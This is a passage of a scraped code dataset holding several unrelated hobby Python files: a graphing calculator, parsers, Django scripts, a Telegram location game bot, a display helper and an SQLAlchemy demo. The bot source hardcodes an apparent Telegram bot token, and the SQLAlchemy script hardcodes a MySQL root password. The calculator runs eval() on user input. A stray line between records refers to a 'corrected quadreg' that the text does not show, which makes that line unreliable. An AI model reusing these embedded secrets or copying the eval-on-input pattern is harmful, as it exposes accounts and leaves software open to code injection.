Separate by commas: \")\nlinetypelist = linetypelist.split(\",\")\nfor linetype in linetypelist:\n if linetype == \"f\":\n function = input(\"y=\")\n for x in xcoordinates:\n yval = (-20*(eval(function))+500)\n if yval >= 0 and yval <= 1000:\n Sprite (circle, ((20*x+950), yval))\n if linetype == \"p\":\n again = True\n ylistpts=[]\n xlistpts=[]\n while again == True:\n point = input(\"input point x,y. press q to quit, qr or lr to regress: \")\n if point == \"q\" or point == \"qr\" or point == \"lr\":\n again = False\n if again == True:\n point = point.split(\",\")\n xlistpts.append(float(point[0]))\n ylistpts.append(float(point[1]))\n if point == \"lr\":\n xlistmean = (sum(xlistpts))/len(xlistpts)\n ylistmean = (sum(ylistpts))/len(ylistpts)\n xmeanlist = []\n ymeanlist = []\n for i in xlistpts:\n x = i-xlistmean\n x = x**2\n xmeanlist.append(x)\n for i in ylistpts:\n y = i-ylistmean\n y = y**2\n ymeanlist.append(y)\n sdx = (sum(xmeanlist)/len(xmeanlist))**0.5\n sdy = (sum(ymeanlist)/len(ymeanlist))**0.5\n rval = correlation(xlistpts, ylistpts)\n regreslope = rval*(sdy/sdx)\n regreintercept = ylistmean - (regreslope*xlistmean)\n regreinterceptprint = str(round(10*regreintercept)/10)\n oper = \"+\"+regreinterceptprint\n if regreintercept < 0:\n oper = \"-\"+regreinterceptprint\n if regreintercept == 0:\n oper = \"\"\n print (\"Regression: y=\"+str((round(10*regreslope))/10)+\"x\"+ oper +\". r = \" + str(round(10000*rval)/10000))\n for x in xcoordinates:\n yval = (-20*(regreslope*x+regreintercept)+500)\n if yval >= 0 and yval <= 1000:\n Sprite (circle, ((20*x+950), yval))\n if point == \"qr\":\n abc = quadreg(xlistpts,ylistpts)\n quada = abc[0]\n quadb = abc[1]\n quadc = abc[2]\n for x in xcoordinates:\n yval = (-20*(quada*(x**2)+quadb*x+quadc)+500)\n if yval >= 0 and yval <= 1000:\n Sprite (circle, ((20*x+950), yval))\n goforh = 0\n while goforh <= len(xlistpts)-1:\n Sprite(circlebig, (20*float(xlistpts[goforh])+950, -20*float(ylistpts[goforh])+500))\n goforh += 1\n goforlist = 1\n while goforlist <= len(xlistpts)-1:\n pointz = TextAsset(\"(\"+str(xlistpts[goforlist-1])+\",\"+str(ylistpts[goforlist-1])+\"), (\"+str(xlistpts[goforlist])+\",\"+str(ylistpts[goforlist])+\")\", style = '8pt Arial')\n goforlist+=2\n Sprite (pointz, (10, pointpos*15))\n pointpos+=1\n if linetype in ['a', 'b', 'c', 'd', 'e', 's', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'q', 'r', 't', 'u', 'v', 'w', 'x', 'y', 'z']:\n Sprite (esetreg, (200, 200))\ndef mousePosition(event):\n global text\n global coords\n if coords != None:\n coords.destroy()\n xcurse.y = event.y-7\n ycurse.x = event.x-9\n text = TextAsset(\"(\" + str(round((event.x-959)/20)) + \",\" + str(round((-(event.y-507))/20)) + \")\", style = '10pt Arial')\n coords = Sprite(text, (event.x-7, event.y-22))\ndef mouseclick(event):\n Sprite (smiley, (100, 100))\n \n\nmyapp = App(SCREEN_WIDTH, SCREEN_HEIGHT)\nmyapp.run()\nmyapp.listenMouseEvent('mousemove', mousePosition)\nmyapp.listenMouseEvent('mouseclick', mouseclick)\n","sub_path":"Graphingcalc.py","file_name":"Graphingcalc.py","file_ext":"py","file_size_in_byte":7239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
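A quick sanity check for the corrected quadreg above: points sampled exactly from y = 2x^2 + 3x + 1 should recover the coefficients up to float rounding, since least squares fits quadratic data exactly:

    xs = [-2.0, -1.0, 0.0, 1.0, 2.0, 3.0]
    ys = [2*x**2 + 3*x + 1 for x in xs]
    a, b, c = quadreg(xs, ys)
    print(a, b, c)  # approximately 2.0, 3.0, 1.0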
+{"seq_id":"52991472","text":"#!/usr/bin/env python\n\nimport qm\nimport pylab\nfrom pylab import arange,pi,sin,cos,sqrt\nimport random\n\n# set up the plotting code to use latex\nparams = { 'text.usetex': True }\npylab.rcParams.update(params)\n\n# data parameters\npi = qm.QM_PI\nN = 262144\nsf = 4096.0\ndt = 1.0 / sf\nf_min = 40.0\nconv = 0\n\n# noise generation seed\nseed = 78\n\n# generate an Initial LIGO power spectrum\npsd = qm.new_ligo_psd(N,dt)\n\n# template 1 parameters\nm1_1 = random.uniform(6,14)\nsup_1 = min(3,15-m1_1)\nm2_1 = random.uniform(1,sup_1)\nchi_1 = random.uniform(0.01,0.99)\nkappa_1 = random.uniform(-0.99,0.99)\n\n# template 2 parameters\nm1_2 = random.uniform(6,14)\nsup_2 = min(3,15-m1_1)\nm2_2 = random.uniform(1,sup_1)\nchi_2 = random.uniform(0.01,0.99)\nkappa_2 = random.uniform(-0.99,0.99)\n\ndistance = qm.calculate_ptf_kludge_distance( m1_1, m2_1, chi_1, kappa_1, m1_2, m2_2,\nchi_2, kappa_2, psd, f_min )\n\nprint(\"template #1 parameters: (m1_1, m2_1, chi_1, kappa_1) = (%f %f %f %f)\\n\" % (m1_1,\nm2_1, chi_1, kappa_1))\nprint(\"template #2 parameters: (m1_2, m2_2, chi_2, kappa_2) = (%f %f %f %f)\\n\" % (m1_2,\nm2_2, chi_2, kappa_2))\nprint (\"distance = %f\\n\" % distance)\n","sub_path":"test/ptf_kludge_distance_test.py","file_name":"ptf_kludge_distance_test.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"495917801","text":"# general imports\nimport re\n\n# tokenizer imports\nfrom S_parser.Tokenizer.Stup_Option import Option\nfrom S_parser.Tokenizer.Stup_Selector import Selector\nfrom S_parser.Tokenizer.Token import Token\n# imports for the ast\nfrom S_parser.Tree.Stup_Token_Selector import TokenSelector\n\n# DEBUG FLAGS\nDebugShowTokens = True\n\n# MainOptions with patterns to match\nMainOptions = []\nMainOptions.append(Option(\"Tag\", r\"\\<([a-zA-Z0-9_]+)\\>\", 1))\nMainOptions.append(Option(\"String\", r'\"(?:[^\"\\\\]|\\\\.)*\"'))\nMainOptions.append(Option(\"Regex\", r\"R/(.+?)\\/R\", 1))\nMainOptions.append(Option(\"Colon\", r\"\\:\"))\nMainOptions.append(Option(\"SemiColon\", r\"\\;\"))\nMainOptions.append(Option(\"LBrace\", r\"\\[\"))\nMainOptions.append(Option(\"RBrace\", r\"\\]\"))\nMainOptions.append(Option(\"Comma\", r\"\\,\"))\nMainOptions.append(Option(\"plus\", r\"\\+\"))\nMainOptions.append(Option(\"star\", r\"\\*\"))\n\n# the whitespaces for debugging (whitespace after newline)\nMainOptions.append(Option(\"NewLine\", r\"\\n\"))\nMainOptions.append(Option(\"Whitespace\", r\"\\s+\"))\n\nclass Parser:\n # give the grammar to the parser.\n # the default entrypoint\n def __init__(self, grammar, entry_point=\"start\"):\n # put the grammar for the parser into a variable\n self.grammar = grammar\n self.grammar_text = grammar\n # keep track of where I am inside the grammar\n self.line = 1\n self.index = 0\n print(\"creating the parser!\")\n self.MainSelector = Selector(MainOptions)\n # start building the grammar for my parser\n toks = self.Grammar_to_tokens()\n print(\"build the parser! from text:\")\n print(self.grammar_text)\n self.Meta_Selector = TokenSelector(toks, entry_point)\n\n # get the tokens from the grammar file\n def Grammar_to_tokens(self):\n # get all the tokens from the grammar file\n tokens = []\n for tok in self.get_Tokens():\n if tok[1].name == \"NewLine\":\n self.line += 1\n self.index = 0\n else:\n # update the location after setting the token\n if tok[1].name != \"Whitespace\":\n tok[1].setLocation(self.line, self.index)\n tokens.append(tok)\n # add the length of the token to the index\n self.index += len(tok[0])\n\n # tok[0] is the full matched string.\n # tok[1] is the token that get's made\n self.grammar = self.grammar[len(tok[0]):]\n\n # now that we have the tokens we only keep the token object\n tokens = [tok[1] for tok in tokens]\n if DebugShowTokens:\n # show the tokens\n for tok in tokens:\n print(tok)\n return tokens\n\n # private function that returns the tokens\n def get_Tokens(self):\n canParse = True\n # start parsing the grammar file\n while len(self.grammar) > 0 and canParse:\n canParse = False\n choiceIndex = self.MainSelector.select(self.grammar)\n # verify the index\n if self.MainSelector.verifyIndex(choiceIndex):\n canParse = True\n # get the matched text from the chosen option\n matched_text = self.MainSelector.options[choiceIndex].match(self.grammar)\n yield [matched_text.group(0), Token(self.MainSelector.options[choiceIndex].name, matched_text.group(self.MainSelector.options[choiceIndex].group))]\n else:\n # we will have to break out of this loop and see what text does not parse.\n canParse = False\n if len(self.grammar) > 0:\n # could not parse a piece of text\n print(\"length of text is:'{}'\".format(len(self.grammar)))\n raise SyntaxError(\"The grammar file could not be read correctly. 
Error on:'{}'\".format(self.grammar))\n else:\n print(\"grammar tokenized successfully\")","sub_path":"src/S_parser/Stupid_parser.py","file_name":"Stupid_parser.py","file_ext":"py","file_size_in_byte":3898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"243958089","text":"import tulip.value as v\nfrom tulip.symbol import sym\nfrom tulip.lexer import Token\n\ndef parse_skeleton(lexer):\n lexer.setup()\n parsed = _parse_sequence(lexer, None, 0)\n lexer.teardown()\n return parsed\n\nclass ParseError(StandardError):\n def __init__(self, token, message):\n self.token = token\n self.message = message\n\nclass UnexpectedError(ParseError):\n def dump(self):\n return u'unexpected token %s: %s' % (self.token.dump(), self.message)\n\nclass UnmatchedError(ParseError):\n def dump(self):\n return u'unmatched delimiter %s: expected %s' % (self.token.dump(), self.message)\n\ndef unexpected(tok, message):\n raise UnexpectedError(tok, message)\n\ndef unmatched(tok, message):\n raise UnmatchedError(tok, message)\n\ndef _parse_sequence(lexer, open_tok, expected_close_id):\n elements = []\n\n while True:\n tok = lexer.next()\n\n if tok.tokid == Token.EOF:\n if open_tok is None:\n return v.cons_list(elements)\n else:\n unmatched(open_tok, Token.TOKENS[expected_close_id])\n elif open_tok is not None and tok.tokid == expected_close_id:\n return v.tag(u'nested', [v.Token(open_tok), v.Token(tok), v.cons_list(elements)])\n elif tok.tokid in [ Token.RPAREN, Token.RBRACK, Token.RBRACE ]:\n if open_tok is not None:\n unexpected(tok, u'invalid nesting from %s' % open_tok.dump())\n else:\n unexpected(tok, u'invalid nesting from the beginning')\n elif tok.tokid == Token.LPAREN:\n elements.append(_parse_sequence(lexer, tok, Token.RPAREN))\n elif tok.tokid == Token.LBRACK or tok.tokid == Token.MACRO:\n elements.append(_parse_sequence(lexer, tok, Token.RBRACK))\n elif tok.tokid == Token.LBRACE:\n elements.append(_parse_sequence(lexer, tok, Token.RBRACE))\n elif tok.tokid == Token.NL and expected_close_id == Token.RPAREN:\n pass\n elif tok.tokid == Token.NL and lexer.peek().eats_preceding_newline():\n pass\n else:\n elements.append(v.tag(u'token', [v.Token(tok)]))\n\ndef parse_from_string(s):\n from tulip.reader import StringReader\n from tulip.lexer import ReaderLexer\n reader = StringReader(u'(parse_from_string)', s)\n lexer = ReaderLexer(reader)\n return parse_skeleton(lexer)\n","sub_path":"tulip/skeleton.py","file_name":"skeleton.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"148932074","text":"from newsie.models import ArticleCluster\nfrom datetime import datetime, timedelta\nfrom django.utils import timezone\nfrom newsie.publications.get_articles import categories\n\ndef find_top_stories():\n for category in categories(): #Iterate through RSS feed Categories\n\n #Get today's stories\n today = timezone.make_aware(datetime.today())\n last_36_hours = timezone.make_aware(datetime.today() - timedelta(hours=36))\n\n # Find top 5 clusters if size is 2 or greater\n top_stories = ArticleCluster.objects \\\n .filter(most_recent_pub_date__gte=last_36_hours, category__exact=category, size_today__gte=2) \\\n .order_by('-size_today')[:15]\n\n for cluster in top_stories:\n cluster.top_story_on = today\n cluster.save()","sub_path":"newsie/scripts/find_top_stories.py","file_name":"find_top_stories.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"286130918","text":"import logging\r\nimport sqlite3\r\n\r\nimport math\r\nfrom telegram import Message, Chat, ReplyKeyboardMarkup, KeyboardButton, Location\r\nfrom telegram.ext import Updater, CommandHandler, MessageHandler\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n\r\nDISCOVER_RADIUS = 0.1\r\n\r\ndef start(bot, update):\r\n db_connection = sqlite3.connect('JacobsHack.db')\r\n db = db_connection.cursor()\r\n db.execute(\"CREATE TABLE IF NOT EXISTS users (name text, points integer, objdesc text)\")\r\n\r\n message = \"Something went wrong :(\"\r\n\r\n select_data = (str(update.message.from_user.username),)\r\n db.execute(\"SELECT * FROM users WHERE name=?\", select_data)\r\n user = db.fetchone()\r\n if user:\r\n message = ' '.join(['Welcome back ' + user[0] + '! You have*',\r\n str(user[1]), 'points*.\\nType /help if you need anything.'])\r\n else:\r\n insert_data = (str(update.message.from_user.username), 10, \"\")\r\n db.execute(\"INSERT INTO users (name, points, objdesc) VALUES (?,?,?)\", insert_data)\r\n message = 'Hello ' + insert_data[0] + '!\\nType /help if you need anything!'\r\n\r\n bot.sendMessage(update.message.chat.id, message, parse_mode=\"Markdown\")\r\n db_connection.commit()\r\n\r\n\r\ndef send_help(bot, update):\r\n message = ''.join(['*JHGeoGameBot* hosts a location-based game in which you will try to capture objectives.\\n',\r\n 'To begin playing, type /start and send a location. We will automatically parse it for you and ',\r\n 'give you the distance to the closest objective. Once you\\'re close enough, you will capture ',\r\n 'it and receive *25 points* for your effort.\\n\\n',\r\n 'When you reach *100 points* you will be able to set up your own objective as long as it is ',\r\n 'far enough from any other existing objective. When other users capture your objective, ',\r\n 'you will receive *5 points*.\\n'\r\n ])\r\n bot.sendMessage(update.message.chat.id, message, parse_mode=\"Markdown\")\r\n\r\n\r\ndef get_points(bot, update):\r\n db_connection = sqlite3.connect('JacobsHack.db')\r\n db = db_connection.cursor()\r\n db.execute(\"CREATE TABLE IF NOT EXISTS users (name text, points integer, objdesc text)\")\r\n db.execute(\"CREATE TABLE IF NOT EXISTS locations (lon real, lat real, owner text, objdesc text, id integer) \")\r\n db.execute(\"SELECT points FROM users WHERE name=?\", (str(update.message.from_user.username),))\r\n points = db.fetchone()\r\n message = \"\"\r\n db.execute(\"SELECT * FROM locations\")\r\n print(db.fetchall())\r\n if points is not None:\r\n message = ''.join(['You have *' + str(points[0]) + ' points*.\\n',\r\n 'You can use *100 points* to set up your own objective with /addobj'\r\n ])\r\n else:\r\n message = 'It seems you haven\\'t started playing. 
Type /start and join the game!'\r\n\r\n bot.sendMessage(update.message.chat.id,\r\n message,\r\n reply_to_message_id=update.message.message_id,\r\n parse_mode=\"Markdown\")\r\n\r\n\r\ndef add_objective(bot, update, args):\r\n if len(args) > 0:\r\n db_connection = sqlite3.connect('JacobsHack.db')\r\n db = db_connection.cursor()\r\n db.execute(\"CREATE TABLE IF NOT EXISTS users (name text, points integer, objdesc text)\")\r\n db.execute(\"CREATE TABLE IF NOT EXISTS locations (lon real, lat real, owner text, objdesc text, locid integer) \")\r\n db.execute(\"SELECT * FROM users WHERE name=?\", (str(update.message.from_user.username),))\r\n user = db.fetchone()\r\n if user:\r\n if user[2]:\r\n bot.sendMessage(update.message.chat.id,\r\n 'You are already adding a new objective. Type /cancel to get your points back.',\r\n reply_to_message_id=update.message.message_id)\r\n elif user[1] >= 100:\r\n db.execute(\"UPDATE users SET points=?, objdesc=? WHERE name=?\", (user[1]-100, ' '.join(args), user[0]))\r\n message = ''.join(['I have now subtracted *100 points* from your score. ',\r\n 'The next location you send will be registered as an objective. ',\r\n 'Type /cancel to get your points back.'])\r\n bot.sendMessage(update.message.chat.id,\r\n message,\r\n parse_mode=\"Markdown\",\r\n reply_to_message_id=update.message.message_id)\r\n else:\r\n message = ''.join(['You don\\'t have enough points to set up a new objective.',\r\n ' Try again when you have *100 points*.'])\r\n bot.sendMessage(update.message.chat.id,\r\n message,\r\n reply_to_message_id=update.message.message_id,\r\n parse_mode=\"Markdown\")\r\n else:\r\n bot.sendMessage(update.message.chat.id,\r\n 'It seems you haven\\'t started playing. Type /start and join the game!',\r\n reply_to_message_id=update.message.message_id)\r\n db_connection.commit()\r\n else:\r\n bot.sendMessage(update.message.chat.id,\r\n 'Usage: /addobj ',\r\n reply_to_message_id=update.message.message_id)\r\n\r\n\r\ndef cancel_objective(bot, update):\r\n db_connection = sqlite3.connect('JacobsHack.db')\r\n db = db_connection.cursor()\r\n db.execute(\"CREATE TABLE IF NOT EXISTS users (name text, points integer, objdesc text)\")\r\n db.execute(\"SELECT * FROM users WHERE name=?\", (str(update.message.from_user.username),))\r\n user = db.fetchone()\r\n if user:\r\n if len(user[2]):\r\n db.execute(\"UPDATE users SET points=?, objdesc=? WHERE name=?\", (user[1]+100, \"\", user[0]))\r\n bot.sendMessage(update.message.chat.id,\r\n 'Canceled successfully. You now have *' + str(user[1]+100) + '* points.',\r\n reply_to_message_id=update.message.message_id,\r\n parse_mode=\"Markdown\")\r\n else:\r\n bot.sendMessage(update.message.chat.id,\r\n 'Nothing to cancel.',\r\n reply_to_message_id=update.message.message_id)\r\n else:\r\n bot.sendMessage(update.message.chat.id,\r\n 'It seems you haven\\'t started playing. Type /start and join the game!',\r\n reply_to_message_id=update.message.message_id)\r\n db_connection.commit()\r\n\r\n\r\ndef cheat(bot, update):\r\n db_connection = sqlite3.connect('JacobsHack.db')\r\n db = db_connection.cursor()\r\n db.execute(\"CREATE TABLE IF NOT EXISTS users (name text, points integer, objdesc text)\")\r\n db.execute(\"SELECT * FROM users WHERE name=?\", (str(update.message.from_user.username),))\r\n user = db.fetchone()\r\n if user:\r\n db.execute(\"UPDATE users SET points=? 
WHERE name=?\", (user[1]+100, user[0]))\r\n bot.sendMessage(update.message.chat.id,\r\n 'You HACKED yourself some points.')\r\n db_connection.commit()\r\n\r\n\r\ndef distFromCoords(lon1, lat1, lon2, lat2):\r\n radius = 6371\r\n dlon = abs(lon1-lon2)*math.pi/180\r\n dlat = abs(lat1-lat2)*math.pi/180\r\n a = math.sin(dlat/2)*math.sin(dlat/2)+math.cos(lat1*math.pi/180)*math.cos(lat2*math.pi/180)*math.sin(dlon/2)*math.sin(dlon/2)\r\n b = 2*math.atan2(math.sqrt(a), math.sqrt(1-a))\r\n dist = radius*b\r\n return dist\r\n\r\n\r\ndef message_handler(bot, update):\r\n if update.message.text:\r\n keyboard_button = KeyboardButton(text='Send location', request_location=True)\r\n bot.sendMessage(update.message.chat.id,\r\n 'Less talking and more searching!\\nSend me your location to search around!',\r\n reply_to_message_id=update.message.message_id,\r\n reply_markup=ReplyKeyboardMarkup([[keyboard_button]]))\r\n elif update.message.location:\r\n lon = update.message.location['longitude']\r\n lat = update.message.location['latitude']\r\n db_connection = sqlite3.connect('JacobsHack.db')\r\n db = db_connection.cursor()\r\n db.execute(\"CREATE TABLE IF NOT EXISTS users (name text, points integer, objdesc text)\")\r\n db.execute(\"CREATE TABLE IF NOT EXISTS locations (lon real, lat real, owner text, objdesc text, locid integer) \")\r\n db.execute(\"CREATE TABLE IF NOT EXISTS matches (user text, matchid integer)\")\r\n\r\n db.execute(\"SELECT * FROM users WHERE name=?\", (str(update.message.from_user.username),))\r\n user = db.fetchone()\r\n if user:\r\n min_dist = 10000\r\n usr = ''\r\n desc = ''\r\n objid = 0\r\n for obj in db.execute(\"SELECT * FROM locations WHERE owner!=? AND locid NOT IN (SELECT matchid FROM matches WHERE user=?)\", (user[0],user[0])):\r\n if obj is not None:\r\n dist = distFromCoords(obj[0], obj[1], lon, lat)\r\n if dist < min_dist:\r\n min_dist = dist\r\n usr = obj[2]\r\n desc = obj[3]\r\n objid = obj[4]\r\n if user[2]:\r\n if min_dist > DISCOVER_RADIUS:\r\n db.execute(\"SELECT COUNT(*) FROM locations\")\r\n size = db.fetchone()[0]\r\n db.execute(\"INSERT INTO locations (lon, lat, owner, objdesc, locid) VALUES (?,?,?,?,?)\",\r\n (lon, lat, update.message.from_user.username, user[2], size))\r\n db.execute(\"UPDATE users SET objdesc='' WHERE name=?\", (user[0],))\r\n bot.sendMessage(update.message.chat.id,\r\n '*New objective successfully registered!*',\r\n reply_to_message_id=update.message.message_id,\r\n parse_mode=\"Markdown\")\r\n else:\r\n bot.sendMessage(update.message.chat.id,\r\n 'You\\'re too close to an already existing objective!',\r\n reply_to_message_id=update.message.message_id)\r\n else:\r\n message = 'Something went wrong :('\r\n if 10000 > min_dist >= DISCOVER_RADIUS:\r\n d = (\"%.2f\" % min_dist)\r\n message = 'The closest objective is *' + str(d) + '* km away.'\r\n elif min_dist < DISCOVER_RADIUS:\r\n message = 'Captured the objective \\\"' + desc + '\\\" by @' + usr + '!\\n*+25 POINTS!*'\r\n db.execute(\"UPDATE users SET points = ? WHERE name = ?\", (user[1]+25, user[0]))\r\n db.execute(\"UPDATE users SET points = points+5 WHERE name = ?\", (usr,))\r\n db.execute(\"INSERT INTO matches (user, matchid) VALUES (?,?)\",\r\n (user[0], objid))\r\n else:\r\n message = 'No nearby objectives were found. Your own objectives won\\'t show up'\r\n\r\n bot.sendMessage(update.message.chat.id,\r\n message,\r\n parse_mode=\"Markdown\",\r\n reply_to_message_id=update.message.message_id)\r\n else:\r\n bot.sendMessage(update.message.chat.id,\r\n 'It seems you haven\\'t started playing. 
Type /start and join the game!',\r\n reply_to_message_id=update.message.message_id)\r\n db_connection.commit()\r\n\r\n else:\r\n bot.sendMessage(update.message.chat.id,\r\n 'That\\'s cool! We don\\'t have any use for it though...',\r\n reply_to_message_id=update.message.message_id)\r\n\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n\r\nif __name__ == '__main__':\r\n logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\r\n updater = Updater(token='262103726:AAGOwtH2gGcZTsbi2BL5OpueK5BbKJ0pFIY')\r\n dispatcher = updater.dispatcher\r\n\r\n dispatcher.add_handler(CommandHandler('start', start))\r\n dispatcher.add_handler(CommandHandler('help', send_help))\r\n dispatcher.add_handler(CommandHandler('points', get_points))\r\n dispatcher.add_handler(CommandHandler('addobj', add_objective, pass_args=True))\r\n dispatcher.add_handler(CommandHandler('cancel', cancel_objective))\r\n\r\n dispatcher.add_handler(CommandHandler('cheat', cheat))\r\n\r\n dispatcher.add_handler(MessageHandler([], message_handler))\r\n\r\n updater.start_polling()\r\n updater.idle()\r\n","sub_path":"Jacobs/JacobsBot.py","file_name":"JacobsBot.py","file_ext":"py","file_size_in_byte":13465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
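distFromCoords in the record above is the haversine formula on a 6371 km Earth radius; one degree of latitude along a meridian is a convenient known value to check it against:

    # same longitude, 1 degree of latitude apart
    d = distFromCoords(0.0, 0.0, 0.0, 1.0)
    print(round(d, 1))  # ~111.2 km, i.e. 6371 * pi / 180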
+{"seq_id":"502579836","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nimport coreapp.views\nimport coreapp.urls\n\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'ExpensesMonitor.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', 'coreapp.views.index', name='index'),\n url(r'^login$', 'django.contrib.auth.views.login', name='login'),\n url(r'^register$', 'coreapp.views.register', name='register'),\n url(r'^about$', coreapp.views.about, name='about'),\n url(r'^contact$', coreapp.views.contact, name='contact'),\n url(r'^faq$', coreapp.views.faq, name='faq'),\n\n url(r'^user/', include(coreapp.urls, namespace='user')),\n url(r'^accounts/login/$', 'django.contrib.auth.views.login'),\n url(r'^accounts/logout$', 'django.contrib.auth.views.logout', {'next_page': '/'}),\n)\n","sub_path":"ExpensesMonitor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"103118076","text":"from PIL import ImageFont\r\nfrom font_fredoka_one import FredokaOne\r\n\r\n\r\ndef draw_text(display, draw, message, font_size=24, y_align=\"middle\"):\r\n \"\"\"Get yfinance ticker object from a symbol\r\n\r\n Args:\r\n display (Inky): Inky display object\r\n draw (ImageDraw): ImageDraw object\r\n message (str): Texr message to display\r\n font_size (int): Font size\r\n y_align (str): Y alignment of message: \"middle\", \"top\" or \"bottom\"\r\n Returns:\r\n draw (ImageDraw): Updated ImageDraw object\r\n \"\"\"\r\n font = ImageFont.truetype(FredokaOne, font_size)\r\n w, h = font.getsize(message)\r\n\r\n # Scale down font if the text is bigger than the screen\r\n if w > display.WIDTH:\r\n font_size = int(font_size * display.WIDTH / w)\r\n font = ImageFont.truetype(FredokaOne, font_size)\r\n w, h = font.getsize(message)\r\n\r\n x = (display.WIDTH / 2) - (w / 2)\r\n\r\n if y_align == \"middle\":\r\n y = (display.HEIGHT / 2) - (h / 2)\r\n elif y_align == \"top\":\r\n y = 0\r\n elif y_align == \"bottom\":\r\n y = display.HEIGHT - h\r\n else:\r\n raise Exception(\"y_align parameter not recognised\")\r\n\r\n draw.text((x, y), message, display.BLACK, font)\r\n return draw\r\n\r\n\r\ndef draw_simple_messages(\r\n display,\r\n draw,\r\n messages,\r\n font_sizes={\"top\": 24, \"middle\": 52, \"bottom\": 18},\r\n):\r\n \"\"\"Draw three text messages\r\n\r\n Args:\r\n display (Inky): Inky display object\r\n draw (ImageDraw): ImageDraw object\r\n messages (dict): messages with the keys \"middle\", \"top\" and \"bottom\"\r\n font_sizes (dict): Font sizes dict with the keys \"middle\", \"top\" and \"bottom\"\r\n Returns:\r\n draw (ImageDraw): Updated ImageDraw object\r\n \"\"\"\r\n for location, message in messages.items():\r\n draw = draw_text(\r\n display,\r\n draw,\r\n message=message,\r\n font_size=font_sizes[location],\r\n y_align=location,\r\n )\r\n return draw\r\n\r\n\r\ndef draw_graph_data(display, draw, data, simple_messages, graph_range):\r\n \"\"\"Draw graph mode data\r\n\r\n Args:\r\n display (Inky): Inky display object\r\n draw (ImageDraw): ImageDraw object\r\n data (DataFrame): DataFrame given by get_data\r\n simple_messages (dict): output of draw_simple_messages()\r\n Returns:\r\n draw (ImageDraw): Updated ImageDraw object\r\n \"\"\"\r\n # Display text\r\n message = f\"{simple_messages['top']}: {simple_messages['middle']}\"\r\n font = ImageFont.truetype(FredokaOne, 25)\r\n w, h = font.getsize(message)\r\n x = (display.WIDTH / 2) - (w / 2)\r\n draw.text((x, 0), message, display.BLACK, font)\r\n message = f\"{simple_messages['bottom']}\"\r\n font = ImageFont.truetype(FredokaOne, 15)\r\n w, h = font.getsize(message)\r\n x = (display.WIDTH / 2) - (w / 2)\r\n draw.text((x, 25), message, display.BLACK, font)\r\n\r\n # Display graph\r\n x_margin_right = 50\r\n\r\n y_margin_top = 50\r\n y_margin_bot = 5\r\n y_range = display.HEIGHT - y_margin_top - y_margin_bot\r\n\r\n price_data = list(data[\"close\"])[-graph_range:]\r\n max_price = round(max(price_data), 2)\r\n min_price = round(min(price_data), 2)\r\n\r\n x_list = []\r\n y_list = []\r\n\r\n # y: change scale from [max_price, max_price] to [0, display.HEIGHT]\r\n y_data = [\r\n (display.HEIGHT * (y - min_price)) / (max_price - min_price) for y in price_data\r\n ]\r\n for i in range(graph_range):\r\n x = i * (display.WIDTH - x_margin_right) / graph_range\r\n y = y_data[i]\r\n y = display.HEIGHT - y # 0 on bottom\r\n y = y / display.HEIGHT * y_range + y_margin_top # apply limited range (y_range)\r\n\r\n 
x_list.append(x)\r\n y_list.append(y)\r\n\r\n draw.line(list(zip(x_list, y_list)), fill=display.BLACK, width=2)\r\n\r\n # Display min price and max price on right side\r\n draw.text(\r\n (display.WIDTH - x_margin_right + 2, y_margin_top - 3),\r\n str(max_price),\r\n display.BLACK,\r\n ImageFont.truetype(FredokaOne, 15),\r\n )\r\n draw.text(\r\n (display.WIDTH - x_margin_right + 2, display.HEIGHT - 15),\r\n str(min_price),\r\n display.BLACK,\r\n ImageFont.truetype(FredokaOne, 15),\r\n )\r\n return draw\r\n","sub_path":"ticker/display_utils.py","file_name":"display_utils.py","file_ext":"py","file_size_in_byte":4217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"418843672","text":"# 使用SQLAlchemy \n# ORM, 把关系数据库的表结构映射到对象上\nimport pymysql\n\nfrom sqlalchemy import Column, String, create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\n\nbase = declarative_base()\n\nclass User(base):\n __tablename__ = 'person'\n\n id = Column(String(20),primary_key=True)\n name = Column(String(20))\n\n # 一对多:\n # books = relationship('Book')\n\n# class Book(base):\n# __tablename__ = 'book'\n# id = Column(String(20), primary_key=True)\n# name = Column(String(20))\n# user_id = Column(String(20), ForeignKey('user.id'))\n# 外键\n\nengine = create_engine('mysql+pymysql://root:Zjf9437879228.@localhost:3306/test_py')\n# '数据库类型+数据库驱动名称://用户名:口令@机器地址:端口号/数据库名'\nDBSession = sessionmaker(bind=engine)\n\n# 查询\nsession = DBSession()\nuser = session.query(User).filter(User.id == '3').one()\nprint(user)\nprint('type:',type(user))\nprint('name:',user.name)\n# session.close()\n\n# 插入\nnew_user = User(id='4', name='Bob')\n\nsession.add(new_user)\nsession.commit()\nsession.close()","sub_path":"SQL/SQLAlchemy123.py","file_name":"SQLAlchemy123.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
